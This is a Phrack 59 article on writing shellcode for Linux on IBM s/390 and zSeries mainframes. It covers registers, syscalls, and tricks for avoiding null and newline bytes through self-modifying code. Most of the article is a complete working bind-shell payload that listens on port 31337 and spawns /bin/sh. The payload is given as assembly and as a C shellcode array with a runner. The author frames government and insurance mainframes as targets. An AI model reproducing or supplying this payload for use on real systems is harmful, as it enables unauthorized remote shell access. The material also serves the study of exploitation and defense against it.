AOH :: P59-0X0D.TXT

Phrack 59 File 13: Linux/390 shellcode development


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3b, Phile #0x0d of 0x12

|=----------------=[ Linux/390 shellcode development ]=------------------=|
|=-----------------------------------------------------------------------=|
|=-------=[ johnny cyberpunk <jcyberpunk@thehackerschoice.com> ]=--------=|


--[ Contents

  1 - Introduction

  2 - History and facts
    2.1 - Registers
    2.2 - Instruction set
    2.3 - Syscalls
    2.4 - The native code
    2.5 - Avoiding the evil 0x00 and 0x0a
    2.6 - The final code

  3 - References



--[ 1 - Introduction

    Since Linux/390 has been released by IBM more and more b0xes of this
type can be found in the wild. A good reason for a hacker to get a closer
look on how vulnerable services can be exploited on a mainframe. Remember,
who are the owners of mainframes ? Yeah, big computer centres, insurances
or goverments. Well, in this article I'll uncover how to write the bad code
(aka shellcode). The bind-shellcode at the end should be taken as an 
example. Other shellcode and exploit against some known vulnerabilities can
be found on a seperate link (see References) in the next few weeks.

    Suggestions, improvements or flames can be send directly to the email
address posted in the header of this article. My gpg-key can be found at
the document bottom.


--[ 2 - History and facts

    In late 1998 a small team of IBM developers from Boeblingen/Germany
started to port Linux to mainframes. One year later in December 1999 the
first version has been published for the IBM s/390. There are two versions
available:

    A 32 bit version, referred to as Linux on s/390 and a 64 bit version, 
referred to as Linux on zSeries. Supported distros are Suse, Redhat and
TurboLinux. Linux for s/390 is based on the kernel 2.2, the zSeries is
based on kernel 2.4. There are different ways to run Linux:

Native       - Linux runs on the entire machine, with no other OS
LPAR         - Logical PARtition): The hardware can be logically
               partitioned, for example, one LPAR hosts a VM/VSE
               environment and another LPAR hosts Linux. 
VM/ESA Guest - means that a customer can also run Linux in a virtual
               machine

The binaries are in ELF format (big endianess).




----[ 2.1 - Registers

    For our shellcode development we really don't need the whole bunch of
registers the s/390 or zSeries has. The most interesting for us are the
registers %r0-%r15. Anyway I'll list some others here for to get an
overview.

General propose registers        : 
        %r0-%r15 or gpr0-gpr15 are used for addressing and arithmetic
        
Control registers                : 
        cr0-cr15 are only used by kernel for irq control, memory
        management, debugging control ...
        
Access registers                 :
        ar0-ar15 are normally not used by programs, but good for 
        temporary storage
        
Floating point registers        :
        fp0-fp15 are IEEE and HFP floating ( Linux only uses IEEE )
        
PSW ( Programm Status Word )        :
        is the most important register and serves the roles of a program
        counter, memory space designator and condition code register.
        For those who wanna know more about this register, should take
        a closer look on the references at the bottom.
        


        
----[ 2.2 - Instruction set

Next I'll show you some useful instructions we will need, while developing
our shellcode.


Instruction                        Example
---------------------------------------------------------------------------
basr (branch and save)        %r1,0               # save value 0 to %r1
lhi  (load h/word immediate)  lhi %r4,2           # load value 2 into %r4
la   (load address)           la %r3,120(%r15)    # load address from
                                                  # %r15+120 into %r3
lr   (load register)          lr %r4,%r9          # load value from %r9
                                                  # into %r4
stc  (store character)        stc %r6,120(%r15)   # store 1 character from
                                                  # %r6 to %r15+120
sth  (store halfword)         sth %r3,122(%r15)   # store 2 bytes from
                                                  # %r3 to %r15+122
ar   (add)                    ar %r6,%r10         # add value in %r10 ->%r6
xr   (exclusive or)           xr %r2,%r2          # 0x00 trick :)
svc  (service call)           svc 1               # exit




----[ 2.3 - Syscalls

    On Linux for s/390 or zSeries syscalls are done by using the
instruction SVC with it's opcode 0x0a ! This is no good message for
shellcoders, coz 0x0a is a special character in a lot of services. But
before i start explaining how we can avoid using this call let's have a
look on how our OS is using the syscalls.

    The first four parameters of a syscall are delivered to the registers
%r2-%r5 and the resultcode can be found in %r2 after the SVC call.

Example of an execve call:

        basr	  %r1,0
base:
        la        %r2,exec-base(%r1)
        la        %r3,arg-base(%r1)
        la        %r4,tonull-base(%r1)
        svc     11

exec:
        .string  "/bin//sh"
arg:        
        .long   exec 
tonull:
        .long   0x0
        

    A special case is the SVC call 102 (SYS_SOCKET). First we have to feed
the register %r2 with the desired function ( socket, bind, listen, accept, 
....) and %r3 points to a list of parameters this function needs. Every
parameter in this list has its own u_long value.

And again an example of a socket() call :

        lhi        %r2,2                # domain
        lhi        %r3,1                # type
        xr         %r4,%r4              # protocol
        stm        %r2,%r4,128(%r15)    # store %r2 - %r4
        lhi        %r2,1                # function socket()
        la         %r3,128(%r15)        # pointer to the API values
        svc        102                  # SOCKETCALL
        lr         %r7,%r2              # save filedescriptor to %r7

        


        
----[ 2.4 - The native code

So now, here is a sample of a complete portbindshell in native style :

        .globl _start
        
_start:
        basr       %r1,0                     # our base-address
base:

        lhi        %r2,2                     # AF_INET
        sth        %r2,120(%r15)
        lhi        %r3,31337                 # port
        sth        %r3,122(%r15)
        xr         %r4,%r4                   # INADDR_ANY
        st         %r4,124(%r15)             # 120-127 is struct sockaddr *
        lhi        %r3,1                     # SOCK_STREAM
        stm        %r2,%r4,128(%r15)         # store %r2-%r4, our API values
        lhi        %r2,1                     # SOCKET_socket
        la         %r3,128(%r15)             # pointer to the API values
        svc        102                       # SOCKETCALL 
        lr         %r7,%r2                   # save socket fd to %r7
        la         %r3,120(%r15)             # pointer to struct sockaddr *
        lhi        %r9,16                    # save value 16 to %r9
        lr         %r4,%r9                   # sizeof address
        stm        %r2,%r4,128(%r15)         # store %r2-%r4, our API values
        lhi        %r2,2                     # SOCKET_bind
        la         %r3,128(%r15)             # pointer to the API values
        svc        102                       # SOCKETCALL
        lr         %r2,%r7                   # get saved socket fd
        lhi        %r3,1                     # MAXNUMBER
        stm        %r2,%r3,128(%r15)         # store %r2-%r3, our API values
        lhi        %r2,4                     # SOCKET_listen
        la         %r3,128(%r15)             # pointer to the API values
        svc        102                       # SOCKETCALL
        lr         %r2,%r7                   # get saved socket fd
        la         %r3,120(%r15)             # pointer to struct sockaddr *
        stm        %r2,%r3,128(%r15)         # store %r2-%r3,our API values
        st         %r9,136(%r15)             # %r9 = 16, this case: fromlen
        lhi        %r2,5                     # SOCKET_accept
        la         %r3,128(%r15)             # pointer to the API values
        svc        102                       # SOCKETCALL
        xr         %r3,%r3                   # the following shit
        svc        63                        # duplicates stdin, stdout
        ahi        %r3,1                     # stderr
        svc        63                        # DUP2
        ahi        %r3,1                        
        svc        63                        
        la         %r2,exec-base(%r1)        # point to /bin/sh
        la         %r3,arg-base(%r1)         # points to address of /bin/sh
        la         %r4,tonull-base(%r1)      # point to envp value
        svc        11                        # execve
        slr        %r2,%r2                        
        svc        1                         # exit
        
exec:
        .string  "/bin//sh"
arg:
        .long   exec
tonull:
        .long   0x0                




----[ 2.5 - Avoiding 0x00 and 0x0a

    To get a clean working shellcode we have two things to bypass. First
avoiding 0x00 and second avoiding 0x0a.

Here is our first case :

a7 28 00 02             lhi     %r2,02

And here is my solution :

a7 a8 fb b4             lhi     %r10,-1100
a7 28 04 4e             lhi     %r2,1102
1a 2a                   ar      %r2,%r10

    I statically define a value -1100 in %r10 to use it multiple times.
After that i load my wanted value plus 1100 and in the next instruction
the subtraction of 1102-1100 gives me the real value. Quite easy.

To get around the next problem we have to use selfmodifing code:

svc:
        .long 0x0b6607fe          <---- will be svc 66, br %r14 after
                                        code modification

    Look at the first byte, it has the value 0x0b at the moment. The
following code changes this value to 0x0a:

basr      %r1,0                   # our base-address
la        %r9,svc-base(%r1)       # load address of svc subroutine
lhi       %r6,1110                # selfmodifing
lhi       %r10,-1100              # code is used 
ar        %r6,%r10                # 1110 - 1100 = \x0a opcode SVC
stc       %r6,svc-base(%r1)       # store svc opcode

Finally the modified code looks as follows :

0a 66                svc 66
07 fe                br %r14

To branch to this subroutine we use the following command :

basr        	     %r14,%r9     # branch to subroutine SVC 102

    The Register %r9 has the address of the subroutine and %r14 contains
the address where to jump back.




----[ 2.6 - The final code

Finally we made it, our shellcode is ready for a first test:

        .globl _start
        
_start:
        basr      %r1,0                   # our base-address
base:
        la        %r9,svc-base(%r1)       # load address of svc subroutine
        lhi       %r6,1110                # selfmodifing
        lhi       %r10,-1100              # code is used 
        ar        %r6,%r10                # 1110 - 1100 = \x0a opcode SVC
        stc       %r6,svc-base(%r1)       # store svc opcode 
        lhi       %r2,1102                # portbind code always uses
        ar        %r2,%r10                # real value-1100 (here AF_INET)
        sth       %r2,120(%r15)
        lhi       %r3,31337               # port
        sth       %r3,122(%r15)
        xr        %r4,%r4                 # INADDR_ANY
        st        %r4,124(%r15)           # 120-127 is struct sockaddr *
        lhi       %r3,1101                # SOCK_STREAM
        ar        %r3,%r10
        stm       %r2,%r4,128(%r15)       # store %r2-%r4, our API values
        lhi       %r2,1101                # SOCKET_socket
        ar        %r2,%r10
        la        %r3,128(%r15)           # pointer to the API values
        basr      %r14,%r9                # branch to subroutine SVC 102
        lr        %r7,%r2                 # save socket fd to %r7
        la        %r3,120(%r15)           # pointer to struct sockaddr *
        lhi       %r8,1116                
        ar        %r8,%r10                # value 16 is stored in %r8
        lr        %r4,%r8                 # size of address
        stm       %r2,%r4,128(%r15)       # store %r2-%r4, our API values
        lhi       %r2,1102                # SOCKET_bind
        ar        %r2,%r10
        la        %r3,128(%r15)           # pointer to the API values
        basr      %r14,%r9                # branch to subroutine SVC 102
        lr        %r2,%r7                 # get saved socket fd
        lhi       %r3,1101                # MAXNUMBER
        ar        %r3,%r10
        stm       %r2,%r3,128(%r15)       # store %r2-%r3, our API values
        lhi       %r2,1104                # SOCKET_listen
        ar        %r2,%r10
        la        %r3,128(%r15)           # pointer to the API values
        basr      %r14,%r9                # branch to subroutine SVC 102
        lr        %r2,%r7                 # get saved socket fd
        la        %r3,120(%r15)           # pointer to struct sockaddr *
        stm       %r2,%r3,128(%r15)       # store %r2-%r3, our API values
        st        %r8,136(%r15)           # %r8 = 16, in this case fromlen
        lhi       %r2,1105                # SOCKET_accept
        ar        %r2,%r10
        la        %r3,128(%r15)           # pointer to the API values
        basr      %r14,%r9                # branch to subroutine SVC 102
        lhi       %r6,1163                # initiate SVC 63 = DUP2
        ar        %r6,%r10
        stc       %r6,svc+1-base(%r1)        # modify subroutine to SVC 63
        lhi       %r3,1102                # the following shit
        ar        %r3,%r10                # duplicates
        basr      %r14,%r9                # stdin, stdout
        ahi       %r3,-1                        # stderr
        basr      %r14,%r9                # SVC 63 = DUP2
        ahi       %r3,-1
        basr      %r14,%r9
        lhi       %r6,1111                # initiate SVC 11 = execve
        ar        %r6,%r10
        stc       %r6,svc+1-base(%r1)     # modify subroutine to SVC 11
        la        %r2,exec-base(%r1)      # point to /bin/sh
        st        %r2,exec+8-base(%r1)    # save address to /bin/sh
        la        %r3,exec+8-base(%r1)    # points to address of /bin/sh
        xr        %r4,%r4                 # 0x00 is envp
        stc       %r4,exec+7-base(%r1)    # fix last byte /bin/sh\\ to 0x00
        st        %r4,exec+12-base(%r1)   # store 0x00 value for envp
        la        %r4,exec+12-base(%r1)   # point to envp value
        basr      %r14,%r9                # branch to subroutine SVC 11
svc:
        .long 0x0b6607fe                  # our subroutine SVC n + br %r14
exec:
        .string  "/bin/sh\\"
        

In a C-code environment it looks like this :

char shellcode[]=
"\x0d\x10"		/* basr    %r1,%r0				*/
"\x41\x90\x10\xd4"	/* la      %r9,212(%r1)				*/
"\xa7\x68\x04\x56"	/* lhi     %r6,1110				*/
"\xa7\xa8\xfb\xb4"	/* lhi     %r10,-1100				*/
"\x1a\x6a"		/* ar      %r6,%r10				*/
"\x42\x60\x10\xd4"	/* stc     %r6,212(%r1)				*/
"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
"\x1a\x2a"		/* ar      %r2,%r10				*/
"\x40\x20\xf0\x78"	/* sth     %r2,120(%r15)			*/
"\xa7\x38\x7a\x69"	/* lhi     %r3,31337				*/
"\x40\x30\xf0\x7a"	/* sth     %r3,122(%r15)			*/
"\x17\x44"		/* xr      %r4,%r4				*/
"\x50\x40\xf0\x7c"	/* st      %r4,124(%r15)			*/
"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
"\x1a\x3a"		/* ar      %r3,%r10				*/
"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
"\xa7\x28\x04\x4d"	/* lhi     %r2,1101				*/
"\x1a\x2a"		/* ar      %r2,%r10				*/
"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\x18\x72"		/* lr      %r7,%r2				*/
"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
"\xa7\x88\x04\x5c"	/* lhi     %r8,1116				*/
"\x1a\x8a"		/* ar      %r8,%r10				*/
"\x18\x48"		/* lr      %r4,%r8				*/
"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
"\x1a\x2a"		/* ar      %r2,%r10				*/
"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\x18\x27"		/* lr      %r2,%r7				*/
"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
"\x1a\x3a"		/* ar      %r3,%r10				*/
"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
"\xa7\x28\x04\x50"	/* lhi     %r2,1104				*/
"\x1a\x2a"		/* ar      %r2,%r10				*/
"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\x18\x27"		/* lr      %r2,%r7				*/
"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
"\x50\x80\xf0\x88"	/* st      %r8,136(%r15)			*/
"\xa7\x28\x04\x51"	/* lhi     %r2,1105				*/
"\x1a\x2a"		/* ar      %r2,%r10				*/
"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\xa7\x68\x04\x8b"	/* lhi     %r6,1163				*/
"\x1a\x6a"		/* ar      %r6,%r10				*/
"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
"\xa7\x38\x04\x4e"	/* lhi     %r3,1102				*/
"\x1a\x3a"		/* ar      %r3,%r10				*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\xa7\x68\x04\x57"	/* lhi     %r6,1111				*/
"\x1a\x6a"		/* ar      %r6,%r10				*/
"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
"\x41\x20\x10\xd8"	/* la      %r2,216(%r1)				*/
"\x50\x20\x10\xe0"	/* st      %r2,224(%r1)				*/
"\x41\x30\x10\xe0"	/* la      %r3,224(%r1)				*/
"\x17\x44"		/* xr      %r4,%r4				*/
"\x42\x40\x10\xdf"	/* stc     %r4,223(%r1)				*/
"\x50\x40\x10\xe4"	/* st      %r4,228(%r1)				*/
"\x41\x40\x10\xe4"	/* la      %r4,228(%r1)				*/
"\x0d\xe9"		/* basr    %r14,%r9				*/
"\x0b\x66"		/* svc	   102 		<--- after modification	*/
"\x07\xfe"		/* br      %r14					*/
"\x2f\x62\x69\x6e"	/* /bin						*/
"\x2f\x73\x68\x5c";	/* /sh\						*/

main()
{
 void (*z)()=(void*)shellcode;
 z();
}




--[ 3 - References:


[1] z/Architecture Principles of Operation (SA22-7832-00) 
    http://publibz.boulder.ibm.com/epubs/pdf/dz9zr000.pdf

[2] Linux for S/390 ( SG24-4987-00 )
    http://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg244987.pdf

[3] LINUX for S/390 ELF Application Binary Interface Supplement
    http://oss.software.ibm.com/linux390/docu/l390abi0.pdf

[4] Example exploits
    http://www.thehackerschoice.com/misc/sploits/

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Weitere Infos: siehe http://www.gnupg.org

mQGiBDzw5yMRBACGJ1o25Bfbb6mBkP2+qwd0eCTvCmC5uJGdXWOW8BbQwDHkoO4h
sdouA+0JdlTFIQriCZhZWbspNsWEpXPOAW8vG3fSqIUqiDe6Aj21h+BnW0WEqx9t
8TkooEVS3SL34wiDCig3cQtmvAIj0C9g4pj5B/QwHJYrWNFoAxc2SW1lXwCg8Wk9
LawvHW+Xqnc6n/w5Oo8IpNsD/2Lp4fvQFiTvN22Jd63nCQ75A64fB7mH7ZUsVPYy
BctYXM4GhcHx7zfOhAbJQNWoNmYGiftVr9UvO9GSnG+Y9jq6I16qOn7T7dIZUEpL
F5FevEFTyrtDGYmBhGv9hwtbz3CI9n9gpZxz1xYTbDHxkVIiTMlcNR3GIJRPfo5B
a7u4A/9ncKqRx2HbRkaj39zugC6Y28z9lSimGzu7PTVw3bxDbObgi4CyHcjnHe+j
DResuKGgdyEf+d07ofbFEOdQjgaDx1mmswS4pcILKOyRdQMtdbgSdyPlJw5KGHLX
G0hrHV/Uhgok3W6nC43ZvPWbd3HVfOIU8jDTRgWaRDjGc45dtbQkam9obm55IGN5
YmVycHVuayA8am9obmN5YnBrQGdteC5uZXQ+iFcEExECABcFAjzw5yMFCwcKAwQD
FQMCAxYCAQIXgAAKCRD3c5EGutq/jMW7AJ9OSmrB+0vMgPfVOT4edV7C++RNHwCf
byT/qKeSawxasF8g4HeX33fSPe25Ag0EPPDnrRAIALdcTn8E2Z8Z4Ua4p8fjwXNO
iP6GOANUN5XLpmscv9v5ErPfK+NM2ARb7O7rQJfLkmKV8voPNj4lPUUyltGeOhzj
t86I5p68RRSvO5JKTW+riZamaD8lB84YqLzmt9OuzuOeAJCq3GuQtPMyrNuOkPL9
nX51EgnLnYaUYAkysAhYLhlrye/3maNdjtn2T63MoJauAoB4TpKvegsGsf1pA5mj
y9fuG6zGnWt8XpVSdD2W3PUJB+Q7J3On35byebIKiuGsti6Y5L0ZSDlW2rveZp9g
eRSQz06j+mxAooTUMBBJwMmXjHm5nTgr5OX/8mpb+I73MGhtssRr+JW+EWSLQN8A
AwcH/iqRCMmPB/yiMhFrEPUMNBsZOJ+VK3PnUNLbAPtHz7E2ZmEpTgdvLR3tjHTC
vZO6k40H1BkodmdFkCHEwzhWwe8P3a+wgW2LnPCM6tfPEfp9kPXD43UlTLWLL4RF
cPmyrs45B2uht7aE3Pe0SgbsnWAej87Stwb+ezOmngmrRvZKnYREVR1RHRRsH3l6
C4rexD3uHjFNdEXieW97xHG71YpOVDX6slCK2SumfxzQAEZC2n7/DqwPd6Z/abAf
Ay9WmTpqBFd2FApUtZ1h8cpS6MYb6A5R2BDJQl1hN2pQFNzIh8chjVdQc67dKiay
R/g0Epg0thiVAecaloCJlJE8b3OIRgQYEQIABgUCPPDnrQAKCRD3c5EGutq/jNuP
AJ979IDls926vsxlhRA5Y8G0hLyDAwCgo8eWQWI7Y+QVfwBG8XCzei4oAiI=
=2B7h
-----END PGP PUBLIC KEY BLOCK-----


|=[ EOF ]=---------------------------------------------------------------=|

AOH Site layout & design copyright © 2006 AOH